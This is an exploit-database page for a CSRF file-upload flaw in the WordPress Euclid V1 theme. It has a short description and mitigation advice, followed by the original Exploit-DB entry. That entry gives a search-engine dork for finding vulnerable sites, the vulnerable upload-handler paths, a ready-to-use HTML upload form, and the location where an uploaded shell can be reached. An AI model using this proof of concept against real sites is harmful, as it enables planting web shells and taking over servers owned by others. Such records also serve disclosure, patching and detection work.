header-logo
Suggest Exploit
vendor:
Euclid
by:
DevilScreaM
7,5
CVSS
HIGH
CSRF
352
CWE
Product Name: Euclid
Affected Version From: 1.x.x
Affected Version To: 1.x.x
Patch Exists: NO
Related CWE: N/A
CPE: a:freelancewp:euclid
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mozila, Chrome, Opera -> Windows & Linux
2013

WordPress Euclid V1 Themes CSRF File Upload Vulnerability

A CSRF File Upload Vulnerability exists in Wordpress Euclid V1 Themes. An attacker can exploit this vulnerability to upload malicious files on the server. The vulnerable file is upload-handler.php which is located in the functions folder. An attacker can craft a malicious form and send it to the victim. When the victim submits the form, the malicious file will be uploaded on the server. The uploaded file can be accessed via http://site-target/uploads/[years]/[month]/your_shell.php

Mitigation:

The best way to mitigate this vulnerability is to restrict the access to the upload-handler.php file and also to validate the file type before uploading it on the server.
Source

Exploit-DB raw data:

#Title : Wordpress Euclid V1 Themes CSRF File Upload Vulnerability

#Author : DevilScreaM

#Date : 11/17/2013 - 17 November 2013

#Category : Web Applications

#Type : PHP

#Version : 1.x.x

#Vendor : http://freelancewp.com

#Download : http://freelancewp.com/wordpress-theme/euclid/

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
     Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

#Dork : 

inurl:wp-content/themes/euclid_v1


CSRF File Upload Vulnerability

Exploit & POC : 

http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post"> 
Your File: <input name="uploadfile" type="file" /><br /> 
<input type="submit" value="upload" /> 
</form> 


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

Navigation

Suggest Exploit

Services By CQR